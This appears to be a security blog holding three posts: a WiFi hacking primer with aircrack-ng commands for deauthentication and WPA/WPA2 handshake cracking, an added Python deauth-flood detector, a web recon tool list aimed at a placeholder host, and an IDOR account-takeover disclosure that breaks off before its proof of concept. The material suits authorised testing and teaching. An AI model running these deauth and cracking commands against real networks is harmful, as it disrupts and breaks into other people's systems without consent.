WIFI Hacking!

Hello Hackers!

In this blog I am going to show you the basic things about WIFI hacking. Special thanks to Akshay for the well written content :)

################## KEY WORDS ###################

MAC - Media Access Control
BSSID - Basic Service Set Identifier
ESSID - Extended Service Set Identifier
SNR - Signal to Noise Ratio
PSK - Pre Shared Key
WPA - WiFi Protected Access
WEP - Wired Equivalent Privacy
WPS - Wi-Fi Protected Setup

Test points:
# Is the AP running the latest firmware and security patches?
# Has the factory default ESSID been changed?
# Has the default administrative login/password been changed?
# Is the administrative password easily cracked?
# Are stronger authentication options available?
# Are there any unnecessary ports open (e.g., Telnet, HTTP, SNMP)?
# Are those open ports vulnerable to known exploits?
# Are encrypted administrative interfaces available (e.g., SSH, HTTPS)?
# Have security alerts or logs been enabled?
# Are its security parameters consistent with defined policy?
# If the AP is using a PreShared Key (PSK), is it easily cracked?
# If the AP is not using WPA2, can it be upgraded to do so?
# Can the AP withstand simulated 802.11 DoS attacks (e.g., flood attack)?

De-authentication Attack
airodump-ng --channel <ch #> --bssid <mac id> wlan0mon

aireplay-ng --deauth <# of deauth packets> -a <AP mac> -c <client mac> wlan0mon

WPA/WPA2 Cracking:

(!) airmon-ng start wlan0
    # Get the wireless card in monitoring mode to capture the traffic.

(!) airodump-ng wlan0mon
    # Start listening to the network traffic and get the BSSID & ESSID of targets.

(!) airodump-ng --bssid <bssid of AP> -c <ch #> --write <filename> wlan0mon
    # Avoid extra noise from traffic by listening to a single target.
    # Get the BSSID of the clients connected to the target.
    # Write the dump to a file, which may also contain the 4 way handshake.

(!) aireplay-ng --deauth <# of frames> -a <AP bssid> wlan0mon
    # Deauthenticate clients of the target and force them to re-establish the 4 way handshake.
    # The 4 way handshake will be captured in our file as the dump is running in the background.

(!) aircrack-ng <filename> -w <wordlist>
    # Crack the key from the captured file by providing a wordlist.
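The defender's view of the deauth step used in both the De-authentication Attack and the WPA/WPA2 Cracking sections above, as an added example (not part of the original post or of the aircrack-ng suite): a small Python detector that flags a deauthentication flood in a monitor-mode capture. It assumes the frames have already been reduced to (timestamp, subtype, src, dst) tuples, and all MAC addresses are placeholders.

```python
from collections import defaultdict, deque

# IEEE 802.11 management-frame subtypes (frame type 0):
# 8 = beacon, 10 = disassociation, 12 = deauthentication.
DEAUTH_SUBTYPES = {10, 12}
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_s, subtype, src_mac, dst_mac) tuples.
    Returns one (src_mac, window_start_ts, count) alert per source MAC that
    sends at least `threshold` deauth/disassoc frames within `window` seconds.
    A source is reported once, when it first crosses the threshold."""
    recent = defaultdict(deque)   # src_mac -> timestamps inside the sliding window
    alerted = set()
    alerts = []
    for ts, subtype, src, _dst in sorted(frames):
        if subtype not in DEAUTH_SUBTYPES:
            continue               # beacons, probes etc. are not counted
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()            # drop frames older than the window
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, q[0], len(q)))
    return alerts

# Constructed sample capture (placeholder MACs, not real data). A deauth tool
# spoofs the AP's own BSSID as the source, so the flood below appears to come
# from the AP itself, which is exactly what the alert reports.
AP = "00:11:22:33:44:55"        # placeholder BSSID
CLIENT = "66:77:88:99:aa:bb"    # placeholder client MAC
SAMPLE_FRAMES = (
    [(0.1 * i, 8, AP, BROADCAST) for i in range(20)]            # normal beacons
    + [(1.5, 12, AP, CLIENT)]                                   # a single deauth: normal
    + [(3.0 + 0.01 * i, 12, AP, BROADCAST) for i in range(64)]  # 64 deauths in 0.64 s
)

if __name__ == "__main__":
    for src, start, count in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT: {count} deauth/disassoc frames from {src} starting at t={start:.2f}s")
```

A single deauth per client (roaming, AP reboot) is normal; dozens per second from one BSSID is the signature worth alerting on, and a wireless IDS would watch for it per channel.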

Recon is the Key Part-1

Hello Hackers!

Today's topic is all about enumeration, as reconnaissance is the most important step in hacking. So let's begin!

1. Whois lookup
This is the most basic step, which we need to do for every domain we want to test.

Things which we need to check are as follows:
1. Name servers
2. Check whether the website is hosted on shared hosting or a dedicated server.

2. DIG (Domain Information Groper) Command

The dig command is a tool for querying DNS name servers for information about host addresses, mail exchanges, name servers, and related information.

3. Dirsearch
Dirsearch is a simple command line tool designed to brute force directories and files on websites.


python3 dirsearch.py -u 'http://evil.com/' -e php,asp,aspx,jsp,db,config,xls,ini,pdf,txt

4. Dirbuster
DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.

5. lazys3
A Ruby script to brute force AWS S3 bucket names using different permutations.
Command:  ruby lazys3.rb <COMPANY>
Example: ruby lazys3.rb evil

6. LinkFinder

LinkFinder is a Python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing, resulting in new testing ground, possibly containing new vulnerabilities.

python linkfinder.py -i http://www.evil.com/animate.js -o link.html


7. Check out the IP history

8. SSLScan

Scan the website for SSL bugs.

command: sslscan evil.com

9. Wappalyzer

Wappalyzer is a cross-platform utility that uncovers the technologies used on websites.

10. Builtwith

Lets you find out what a website is built with by a simple click on the BuiltWith icon.


About Me.

I am a security enthusiast in the areas of web-applications, network engineering & mobile applications; programming is also a part of my interests (Python lover :p). I also work as an individual web-application security engineer with broad experience in all aspects of security management and implementation. I am looking forward to hardening my skills in various security standards. As a part of my core interest, I always prefer spending my leisure time performing individual security audits and vulnerability assessments or source code analysis. I am also a bug bounty hunter. I participated in all major bug bounty programs organised by internet giants like Google, Microsoft, Apple, Bugcrowd, etc. I have 3+ years of expertise in both black box as well as white box penetration testing.


Hack the Planet :)

Hello Hackers!

Today I am going to disclose my recent finding, where I was able to take over the user's account. The target was planet.com, as initially I was looking for some bugs in Google acquisitions :p

After a Whois lookup and gathering some information from Crunchbase and Wiki, I came to know that it wasn't a Google acquisition, but I still looked for vulnerabilities and found an ACCOUNT TAKEOVER :)

Basically there was an IDOR vulnerability in their reset password link.

Check out the POC:

